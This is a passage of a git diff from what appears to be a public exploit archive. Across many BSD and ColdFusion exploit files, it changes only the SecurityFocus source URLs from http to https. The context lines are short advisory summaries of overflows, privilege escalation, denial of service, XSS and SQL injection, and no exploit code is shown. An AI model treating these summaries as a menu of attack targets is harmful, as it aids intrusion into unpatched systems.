NetBSD kernel that may allow remote attackers to cause the machine to kernel panic on certain architectures. By sending a packet to a machine running the Alpha or SPARC versions of NetBSD, with an unaligned IP timestamp option, it is possible to cause the kernel to perform an unaligned memory access. This will cause a panic, causing the machine to reboot. diff --git a/exploits/bsd/dos/19982.c b/exploits/bsd/dos/19982.c index d49476a25..952624668 100644 --- a/exploits/bsd/dos/19982.c +++ b/exploits/bsd/dos/19982.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1296/info +// source: https://www.securityfocus.com/bid/1296/info A denial of service attack exists that affects FreeBSD, NetBSD and OpenBSD. It is believed that all versions of these operating systems are vulnerable. The vulnerability is related to setting socket options regarding the size of the send and receive buffers on a socketpair. By setting them to certain values, and performing a write the size of the value the options have been set to, FreeBSD can be made to panic. NetBSD and OpenBSD do not panic, but network applications will stop responding. diff --git a/exploits/bsd/dos/21077.c b/exploits/bsd/dos/21077.c index abc78f0dd..b11a55b92 100644 --- a/exploits/bsd/dos/21077.c +++ b/exploits/bsd/dos/21077.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/3220/info +source: https://www.securityfocus.com/bid/3220/info It has been reported that there is a locally exploitable vulnerability in BSDI. diff --git a/exploits/bsd/dos/31333.txt b/exploits/bsd/dos/31333.txt index 81b88e335..4809ce2b1 100644 --- a/exploits/bsd/dos/31333.txt +++ b/exploits/bsd/dos/31333.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28090/info +source: https://www.securityfocus.com/bid/28090/info BSD PPP is prone to a local denial-of-service vulnerability because it fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/bsd/dos/31550.c b/exploits/bsd/dos/31550.c index 10c9e1dc1..b5e9859e3 100644 --- a/exploits/bsd/dos/31550.c +++ b/exploits/bsd/dos/31550.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28479/info +// source: https://www.securityfocus.com/bid/28479/info Multiple BSD platforms are prone to an integer-overflow weakness. diff --git a/exploits/bsd/dos/33318.txt b/exploits/bsd/dos/33318.txt index 4e71028de..8f08054e6 100644 --- a/exploits/bsd/dos/33318.txt +++ b/exploits/bsd/dos/33318.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36884/info +source: https://www.securityfocus.com/bid/36884/info OpenBSD and NetBSD are prone to a denial-of-service vulnerability because they fail to properly parse format strings to the 'printf(1)' function. diff --git a/exploits/bsd/dos/33319.txt b/exploits/bsd/dos/33319.txt index 31a9d9350..4051a0578 100644 --- a/exploits/bsd/dos/33319.txt +++ b/exploits/bsd/dos/33319.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36885/info +source: https://www.securityfocus.com/bid/36885/info Multiple BSD distributions are prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index. diff --git a/exploits/bsd/dos/33708.c b/exploits/bsd/dos/33708.c index 1c87c79e3..beb4f09b9 100644 --- a/exploits/bsd/dos/33708.c +++ b/exploits/bsd/dos/33708.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38559/info +// source: https://www.securityfocus.com/bid/38559/info The FreeBSD and OpenBSD 'ftpd' service is prone to a denial-of-service vulnerability because of a NULL-pointer dereference. diff --git a/exploits/bsd/dos/38059.c b/exploits/bsd/dos/38059.c index f6a756ecb..8646b8919 100644 --- a/exploits/bsd/dos/38059.c +++ b/exploits/bsd/dos/38059.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56671/info +// source: https://www.securityfocus.com/bid/56671/info OpenBSD is prone to a remote denial-of-service vulnerability. diff --git a/exploits/bsd/local/15206.c b/exploits/bsd/local/15206.c index 8f555f190..d0cf8de59 100644 --- a/exploits/bsd/local/15206.c +++ b/exploits/bsd/local/15206.c @@ -1,5 +1,5 @@ /* - * source: http://www.securityfocus.com/bid/43060/info + * source: https://www.securityfocus.com/bid/43060/info * 18.08.2010, babcia padlina * FreeBSD 7.0 - 7.2 pseudofs null ptr dereference exploit * diff --git a/exploits/bsd/local/19411.txt b/exploits/bsd/local/19411.txt index 8de597941..0dc5c7566 100644 --- a/exploits/bsd/local/19411.txt +++ b/exploits/bsd/local/19411.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/510/info +source: https://www.securityfocus.com/bid/510/info In 4.4BSD derivatives there are four secure levels that provide for added filesystem security (among other things) over and above the regular unix permission systems. Part of the secure levels are the system of file flags which include immutable and append-only flags. In secure level 0, these flags are irrelevant. The vulnerability lies in the inherent flaw with security level 1. In security level 1, the file flags are acknowledged; files such as /usr/bin/login can be set immutable and so forth -- however, umounted partitions/devices can be freely written to and modified (by root, of course). Stealth has written a tool which allows for an intruder who has gained root to bypass security level 1 through writing directly to the device and clearing the file flags. The tool also sets the CLEAN flag in the filesystem which fools the computer into thinking the modified device is clean avoiding detection at bootup. A hypothetical situation for exploit of this vulnerability is as follows, diff --git a/exploits/bsd/local/19545.c b/exploits/bsd/local/19545.c index e88f24dd9..29c98940f 100644 --- a/exploits/bsd/local/19545.c +++ b/exploits/bsd/local/19545.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/707/info +source: https://www.securityfocus.com/bid/707/info Due to insufficient bounds checking on arguments (in this case -C) which are supplied by users, it is possible to overwrite the internal stack space of the lpr program while it is executing. This can allow an intruder to cause lpr to execute arbitrary commands by supplying a carefully designed argument to lpr. These commands will be run with the privileges of the lpr program. When lpr is installed setuid or setgid, it may allow intruders to gain those privileges. */ diff --git a/exploits/bsd/local/19726.c b/exploits/bsd/local/19726.c index b28f5dbef..31ee57772 100644 --- a/exploits/bsd/local/19726.c +++ b/exploits/bsd/local/19726.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/940/info +// source: https://www.securityfocus.com/bid/940/info Certain BSD derivative operating systems use an implantation of the /proc filesystem which is vulnerable to attack from malicious local users. This attack will gain the user root access to the host. diff --git a/exploits/bsd/local/20191.c b/exploits/bsd/local/20191.c index 42141a3f1..4340abfee 100644 --- a/exploits/bsd/local/20191.c +++ b/exploits/bsd/local/20191.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1641/info +// source: https://www.securityfocus.com/bid/1641/info Various format string vulnerabilities exist in versions 3.9.5 and prior of 'screen' that may allow local users to elevate their privileges. If screen is setuid root, it is possible to alter the contents of the variable which stores the user id. diff --git a/exploits/bsd/local/21407.c b/exploits/bsd/local/21407.c index e1545e6f1..eff7a2fc9 100644 --- a/exploits/bsd/local/21407.c +++ b/exploits/bsd/local/21407.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/4568/info +source: https://www.securityfocus.com/bid/4568/info It has been reported that BSD-based kernels do not check to ensure that the C library standard I/O file descriptors 0-2 are valid open files before exec()ing setuid images. Consequently, I/O that are opened by a setuid process may be assigned file descriptors equivelent to those used by the C library as 'standard input','standard output', and 'standard error'. diff --git a/exploits/bsd/local/21669.pl b/exploits/bsd/local/21669.pl index 2e0815116..1f4e50103 100755 --- a/exploits/bsd/local/21669.pl +++ b/exploits/bsd/local/21669.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5355/info +source: https://www.securityfocus.com/bid/5355/info A vulnerability has been reported in some versions of the pppd daemon included with multiple BSD distributions. diff --git a/exploits/bsd/local/21881.txt b/exploits/bsd/local/21881.txt index 7c91daea2..5df1b067b 100644 --- a/exploits/bsd/local/21881.txt +++ b/exploits/bsd/local/21881.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5837/info +source: https://www.securityfocus.com/bid/5837/info Rogue is a game included with BSD distributions including FreeBSD and NetBSD. diff --git a/exploits/bsd/local/22811.c b/exploits/bsd/local/22811.c index ded27e3e7..78a4092ea 100644 --- a/exploits/bsd/local/22811.c +++ b/exploits/bsd/local/22811.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7982/info +// source: https://www.securityfocus.com/bid/7982/info A buffer overflow vulnerability has been reported for Abuse-SDL that may result in the execution of attacker-supplied code. The vulnerability exists due to insufficient bounds checking performed on certain command-line options. diff --git a/exploits/bsd/local/23062.c b/exploits/bsd/local/23062.c index 6fc4131d6..01c60e3d7 100644 --- a/exploits/bsd/local/23062.c +++ b/exploits/bsd/local/23062.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8501/info +// source: https://www.securityfocus.com/bid/8501/info Monop (included in bsd-games) is prone to a locally exploitable buffer overrun vulnerability. This is due to insufficient bounds checking of player names. Monop is typically installed setgid games, so it is possible to exploit this issue to execute arbitrary code with these privileges. diff --git a/exploits/bsd/local/23063.c b/exploits/bsd/local/23063.c index 3237528a4..f27a509de 100644 --- a/exploits/bsd/local/23063.c +++ b/exploits/bsd/local/23063.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8501/info +// source: https://www.securityfocus.com/bid/8501/info Monop (included in bsd-games) is prone to a locally exploitable buffer overrun vulnerability. This is due to insufficient bounds checking of player names. Monop is typically installed setgid games, so it is possible to exploit this issue to execute arbitrary code with these privileges. diff --git a/exploits/bsd/local/23655.txt b/exploits/bsd/local/23655.txt index 3c0b9d06b..f67710798 100644 --- a/exploits/bsd/local/23655.txt +++ b/exploits/bsd/local/23655.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9586/info +source: https://www.securityfocus.com/bid/9586/info A vulnerability has been reported to reside in the 'shmat()' system call used in the BSD kernel. Exploiting this issue may allow a local attacker to inject instructions into the memory of a privileged process. diff --git a/exploits/bsd/local/24015.c b/exploits/bsd/local/24015.c index e36f6f910..3c36524d5 100644 --- a/exploits/bsd/local/24015.c +++ b/exploits/bsd/local/24015.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10165/info +// source: https://www.securityfocus.com/bid/10165/info bsd-games mille is prone to a locally exploitable buffer overrun vulnerability. This issue is due to insufficient bounds checking when the user inputs a file name when saving a game. diff --git a/exploits/bsd/local/24113.c b/exploits/bsd/local/24113.c index 77f575d1b..a8869eb4d 100644 --- a/exploits/bsd/local/24113.c +++ b/exploits/bsd/local/24113.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10320/info +// source: https://www.securityfocus.com/bid/10320/info A vulnerability has been reported that affects Systrace on NetBSD, as well as the FreeBSD port by Vladimir Kotal. diff --git a/exploits/bsd/local/30484.txt b/exploits/bsd/local/30484.txt index 631eedaa0..63de627d0 100644 --- a/exploits/bsd/local/30484.txt +++ b/exploits/bsd/local/30484.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25258/info +source: https://www.securityfocus.com/bid/25258/info Systrace is prone to multiple concurrency vulnerabilities due to its implementation of system call wrappers. This problem can result in a race condition between a user thread and the kernel. diff --git a/exploits/bsd/local/33229.c b/exploits/bsd/local/33229.c index 6c4a28523..2fe1abd87 100644 --- a/exploits/bsd/local/33229.c +++ b/exploits/bsd/local/33229.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/36430/info +source: https://www.securityfocus.com/bid/36430/info NetBSD is prone to a local privilege-escalation vulnerability. diff --git a/exploits/bsd/local/36296.pl b/exploits/bsd/local/36296.pl index 06b19cb5f..3879047d5 100755 --- a/exploits/bsd/local/36296.pl +++ b/exploits/bsd/local/36296.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50607/info +source: https://www.securityfocus.com/bid/50607/info OpenPAM is prone to a local privilege-escalation vulnerability. diff --git a/exploits/bsd/remote/19039.txt b/exploits/bsd/remote/19039.txt index b8be9f0ec..d3e286b61 100644 --- a/exploits/bsd/remote/19039.txt +++ b/exploits/bsd/remote/19039.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2/info +source: https://www.securityfocus.com/bid/2/info fingerd is a remote user information server that implements the protocol defined in RFC742. There exists a buffer diff --git a/exploits/bsd/remote/19924.c b/exploits/bsd/remote/19924.c index 4e6fb012f..f2747d3c1 100644 --- a/exploits/bsd/remote/19924.c +++ b/exploits/bsd/remote/19924.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1220/info +// source: https://www.securityfocus.com/bid/1220/info Several buffer overflow vulnerabilities exist in Kerberos 5 implmenetations due to buffer overflows in the Kerberos 4 compatability code. These include MIT Kerberos 5 releases 1.0.x, 1.1 and 1.1.1, MIT Kerberos 4 patch level 10 (and, most likely, prior releases), and Cygnus KerbNet and Network Security (CNS). The main source of problems is due to a buffer overflow in the krb_rd_req() library function. This function is used by every application that supports Kerberos 4 authentication, including, but not limited to, kshrd, klogin, telnetd, ftpd, rkinitd, v4rcp and kpopd. Therefore, it is possible for a remote attacker to exploit this vulnerability and gain root access on affected machines, or obtain root level access once local. diff --git a/exploits/bsd/remote/20731.c b/exploits/bsd/remote/20731.c index 0f652a128..025709606 100644 --- a/exploits/bsd/remote/20731.c +++ b/exploits/bsd/remote/20731.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2548/info +// source: https://www.securityfocus.com/bid/2548/info The BSD ftp daemon and derivatives (such as IRIX ftpd or the ftp daemon shipped with Kerberos 5) contain a number of buffer overflows that may lead to a compromise of root access to malicious users. diff --git a/exploits/bsd/remote/21440.c b/exploits/bsd/remote/21440.c index 4c626e238..38023c495 100644 --- a/exploits/bsd/remote/21440.c +++ b/exploits/bsd/remote/21440.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4701/info +// source: https://www.securityfocus.com/bid/4701/info The ISC DHCPD (Dynamic Host Configuration Protocol) is a collection of software implementing the DHCP protocol. It is available for a range of operating systems, including BSD and Solaris. diff --git a/exploits/bsd/remote/22131.pl b/exploits/bsd/remote/22131.pl index 332e877f6..b13bae066 100755 --- a/exploits/bsd/remote/22131.pl +++ b/exploits/bsd/remote/22131.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6535/info +source: https://www.securityfocus.com/bid/6535/info Network device drivers for several vendors have been reported to disclose potentially sensitive information to attackers. diff --git a/exploits/bsd/remote/35919.c b/exploits/bsd/remote/35919.c index 9d5118b41..43836794d 100644 --- a/exploits/bsd/remote/35919.c +++ b/exploits/bsd/remote/35919.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48528/info +// source: https://www.securityfocus.com/bid/48528/info NetBSD is prone to a stack-based buffer-overflow vulnerability affecting multiple functions in the 'libc/net' library. diff --git a/exploits/cfm/dos/28100.txt b/exploits/cfm/dos/28100.txt index e4ed04098..78daef289 100644 --- a/exploits/cfm/dos/28100.txt +++ b/exploits/cfm/dos/28100.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18624/info +source: https://www.securityfocus.com/bid/18624/info BlueDragon is prone to a remote denial-of-service vulnerability. This issue is due to the application's failure to efficiently handle malformed GET requests. diff --git a/exploits/cfm/remote/21548.txt b/exploits/cfm/remote/21548.txt index 6642c4f14..1ca1a4d90 100644 --- a/exploits/cfm/remote/21548.txt +++ b/exploits/cfm/remote/21548.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5011/info +source: https://www.securityfocus.com/bid/5011/info ColdFusion MX is prone to cross site scripting attacks. diff --git a/exploits/cfm/webapps/21493.txt b/exploits/cfm/webapps/21493.txt index 356e08a86..f585eb771 100644 --- a/exploits/cfm/webapps/21493.txt +++ b/exploits/cfm/webapps/21493.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4882/info +source: https://www.securityfocus.com/bid/4882/info Gafware's CFXImage is a custom tag for ColdFusion. diff --git a/exploits/cfm/webapps/22486.txt b/exploits/cfm/webapps/22486.txt index 528cb06b3..b061a8076 100644 --- a/exploits/cfm/webapps/22486.txt +++ b/exploits/cfm/webapps/22486.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7338/info +source: https://www.securityfocus.com/bid/7338/info It has been reported that multiple input validation errors exist in the index.cfm file included with InstaBoard. Because of this issue, remote attackers may launch SQL injection attacks through the software. diff --git a/exploits/cfm/webapps/22544.txt b/exploits/cfm/webapps/22544.txt index b9d5d319f..b76edba88 100644 --- a/exploits/cfm/webapps/22544.txt +++ b/exploits/cfm/webapps/22544.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7443/info +source: https://www.securityfocus.com/bid/7443/info A vulnerability has been reported for Macromedia ColdFusion MX that may reveal the physical path information to attackers. diff --git a/exploits/cfm/webapps/23256.txt b/exploits/cfm/webapps/23256.txt index fba376e8e..42f75cfa2 100644 --- a/exploits/cfm/webapps/23256.txt +++ b/exploits/cfm/webapps/23256.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8840/info +source: https://www.securityfocus.com/bid/8840/info It has been reported that Macromedia ColdFusion MX may be prone to a cross-site scripting vulnerability due to improper handling of error messages generated by the underlying database. This problem may be exploited by an attacker to construct a malicious link containing HTML or script code that may be rendered in a user's browser upon visiting that link. If successful, an attacker may obtain access to cookie-based authentication credentials that may lead to other attacks. This attack would occur in the security context of the vulnerable site. diff --git a/exploits/cfm/webapps/24081.txt b/exploits/cfm/webapps/24081.txt index 9dddcaa32..dc3c52671 100644 --- a/exploits/cfm/webapps/24081.txt +++ b/exploits/cfm/webapps/24081.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10276/info +source: https://www.securityfocus.com/bid/10276/info It has been reported that FuseTalk is affected by an administrator command execution vulnerability in the adduser.cfm script. This issue is due to a failure of the application to properly validate the origin of user supplied data. diff --git a/exploits/cfm/webapps/24680.txt b/exploits/cfm/webapps/24680.txt index cbaf7f21f..fa368b536 100644 --- a/exploits/cfm/webapps/24680.txt +++ b/exploits/cfm/webapps/24680.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11407/info +source: https://www.securityfocus.com/bid/11407/info FuseTalk Forum is reported prone to multiple input validation vulnerabilities. These issues may allow a remote attacker to carry out cross-site scripting attacks. The cause of these issues is insufficient sanitization of user-supplied data. diff --git a/exploits/cfm/webapps/25982.txt b/exploits/cfm/webapps/25982.txt index 2ee308b7f..7499a83f0 100644 --- a/exploits/cfm/webapps/25982.txt +++ b/exploits/cfm/webapps/25982.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14266/info +source: https://www.securityfocus.com/bid/14266/info A cross-site scripting vulnerability affects Simple Message Board. This issue is due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/25983.txt b/exploits/cfm/webapps/25983.txt index 0a9d82b60..74a0dba71 100644 --- a/exploits/cfm/webapps/25983.txt +++ b/exploits/cfm/webapps/25983.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14267/info +source: https://www.securityfocus.com/bid/14267/info A cross-site scripting vulnerability affects Simple Message Board. This issue is due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/25984.txt b/exploits/cfm/webapps/25984.txt index d9ac00d7a..efd856c1d 100644 --- a/exploits/cfm/webapps/25984.txt +++ b/exploits/cfm/webapps/25984.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14268/info +source: https://www.securityfocus.com/bid/14268/info A cross-site scripting vulnerability affects Simple Message Board. This issue is due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/25985.txt b/exploits/cfm/webapps/25985.txt index 84937a26f..21759ff13 100644 --- a/exploits/cfm/webapps/25985.txt +++ b/exploits/cfm/webapps/25985.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14269/info +source: https://www.securityfocus.com/bid/14269/info A cross-site scripting vulnerability affects Simple Message Board. This issue is due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/26060.txt b/exploits/cfm/webapps/26060.txt index 6354cc17c..d29344437 100644 --- a/exploits/cfm/webapps/26060.txt +++ b/exploits/cfm/webapps/26060.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14440/info +source: https://www.securityfocus.com/bid/14440/info CFBB is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/26065.txt b/exploits/cfm/webapps/26065.txt index 62004c73b..8cfd0056f 100644 --- a/exploits/cfm/webapps/26065.txt +++ b/exploits/cfm/webapps/26065.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14460/info +source: https://www.securityfocus.com/bid/14460/info Fusebox is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/26763.txt b/exploits/cfm/webapps/26763.txt index c34dcc99f..25faf875c 100644 --- a/exploits/cfm/webapps/26763.txt +++ b/exploits/cfm/webapps/26763.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15774/info +source: https://www.securityfocus.com/bid/15774/info CFMagic Products are prone to multiple input validation vulnerabilities. These are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/cfm/webapps/26764.txt b/exploits/cfm/webapps/26764.txt index 0f17b7d12..914d868b1 100644 --- a/exploits/cfm/webapps/26764.txt +++ b/exploits/cfm/webapps/26764.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15774/info +source: https://www.securityfocus.com/bid/15774/info CFMagic Products are prone to multiple input validation vulnerabilities. These are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/cfm/webapps/26765.txt b/exploits/cfm/webapps/26765.txt index 61aef8556..760963fb3 100644 --- a/exploits/cfm/webapps/26765.txt +++ b/exploits/cfm/webapps/26765.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15774/info +source: https://www.securityfocus.com/bid/15774/info CFMagic Products are prone to multiple input validation vulnerabilities. These are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/cfm/webapps/26766.txt b/exploits/cfm/webapps/26766.txt index 304349713..0f657c889 100644 --- a/exploits/cfm/webapps/26766.txt +++ b/exploits/cfm/webapps/26766.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15777/info +source: https://www.securityfocus.com/bid/15777/info CF_Nuke is prone to a local file include vulnerability. This is due to a lack of sanitization of user-supplied input. diff --git a/exploits/cfm/webapps/26767.txt b/exploits/cfm/webapps/26767.txt index 16bb3307e..e04b922f0 100644 --- a/exploits/cfm/webapps/26767.txt +++ b/exploits/cfm/webapps/26767.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15778/info +source: https://www.securityfocus.com/bid/15778/info CF_Nuke is prone to multiple cross-site scripting vulnerabilities. These are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/cfm/webapps/26772.txt b/exploits/cfm/webapps/26772.txt index 9b55761e7..9b29747ec 100644 --- a/exploits/cfm/webapps/26772.txt +++ b/exploits/cfm/webapps/26772.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15805/info +source: https://www.securityfocus.com/bid/15805/info Magic Book Professional is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/26882.txt b/exploits/cfm/webapps/26882.txt index fd37e6008..f1fa7232a 100644 --- a/exploits/cfm/webapps/26882.txt +++ b/exploits/cfm/webapps/26882.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15948/info +source: https://www.securityfocus.com/bid/15948/info Web Content Management Suite is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/26909.txt b/exploits/cfm/webapps/26909.txt index 32f3f79d3..1a81a00d2 100644 --- a/exploits/cfm/webapps/26909.txt +++ b/exploits/cfm/webapps/26909.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15963/info +source: https://www.securityfocus.com/bid/15963/info Community Enterprise is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/26910.txt b/exploits/cfm/webapps/26910.txt index 0be43fa95..f5e0807ee 100644 --- a/exploits/cfm/webapps/26910.txt +++ b/exploits/cfm/webapps/26910.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15964/info +source: https://www.securityfocus.com/bid/15964/info E-Publish is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/26920.txt b/exploits/cfm/webapps/26920.txt index b00ae7479..19e07b994 100644 --- a/exploits/cfm/webapps/26920.txt +++ b/exploits/cfm/webapps/26920.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15995/info +source: https://www.securityfocus.com/bid/15995/info HoneyComb Archive is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/26986.txt b/exploits/cfm/webapps/26986.txt index 1a5e0aa86..4c3b07817 100644 --- a/exploits/cfm/webapps/26986.txt +++ b/exploits/cfm/webapps/26986.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16071/info +source: https://www.securityfocus.com/bid/16071/info PaperThin CommonSpot Content Server is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/27455.txt b/exploits/cfm/webapps/27455.txt index e80b6bc50..593a06edc 100644 --- a/exploits/cfm/webapps/27455.txt +++ b/exploits/cfm/webapps/27455.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17193/info +source: https://www.securityfocus.com/bid/17193/info 1WebCalendar is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/cfm/webapps/27456.txt b/exploits/cfm/webapps/27456.txt index 82679e21d..9761c56c7 100644 --- a/exploits/cfm/webapps/27456.txt +++ b/exploits/cfm/webapps/27456.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17193/info +source: https://www.securityfocus.com/bid/17193/info 1WebCalendar is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/cfm/webapps/27457.txt b/exploits/cfm/webapps/27457.txt index 0528197c9..9315cbffd 100644 --- a/exploits/cfm/webapps/27457.txt +++ b/exploits/cfm/webapps/27457.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17193/info +source: https://www.securityfocus.com/bid/17193/info 1WebCalendar is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/cfm/webapps/27489.txt b/exploits/cfm/webapps/27489.txt index 5fa8833bf..905c4fb3b 100644 --- a/exploits/cfm/webapps/27489.txt +++ b/exploits/cfm/webapps/27489.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17272/info +source: https://www.securityfocus.com/bid/17272/info The couponZONE application is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/27490.txt b/exploits/cfm/webapps/27490.txt index ee0eb27b9..7742ec70c 100644 --- a/exploits/cfm/webapps/27490.txt +++ b/exploits/cfm/webapps/27490.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17273/info +source: https://www.securityfocus.com/bid/17273/info The classifiedZONE script is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/27491.txt b/exploits/cfm/webapps/27491.txt index ad665a970..2b16aa784 100644 --- a/exploits/cfm/webapps/27491.txt +++ b/exploits/cfm/webapps/27491.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17274/info +source: https://www.securityfocus.com/bid/17274/info The couponZONE application is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/cfm/webapps/27493.txt b/exploits/cfm/webapps/27493.txt index eda100aa1..bc390b8e8 100644 --- a/exploits/cfm/webapps/27493.txt +++ b/exploits/cfm/webapps/27493.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17277/info +source: https://www.securityfocus.com/bid/17277/info The realestateZONE script is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/27853.txt b/exploits/cfm/webapps/27853.txt index a0a4b6ce8..46c4d1fe6 100644 --- a/exploits/cfm/webapps/27853.txt +++ b/exploits/cfm/webapps/27853.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17941/info +source: https://www.securityfocus.com/bid/17941/info Cartweaver ColdFusion is prone to SQL-injection vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/cfm/webapps/29334.txt b/exploits/cfm/webapps/29334.txt index 4b2692846..a0acdfc10 100644 --- a/exploits/cfm/webapps/29334.txt +++ b/exploits/cfm/webapps/29334.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21727/info +source: https://www.securityfocus.com/bid/21727/info Future Internet is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cfm/webapps/29335.txt b/exploits/cfm/webapps/29335.txt index 4708634c3..12dafd2cd 100644 --- a/exploits/cfm/webapps/29335.txt +++ b/exploits/cfm/webapps/29335.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21727/info +source: https://www.securityfocus.com/bid/21727/info Future Internet is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cfm/webapps/29567.txt b/exploits/cfm/webapps/29567.txt index aeb74dceb..378ccb16e 100644 --- 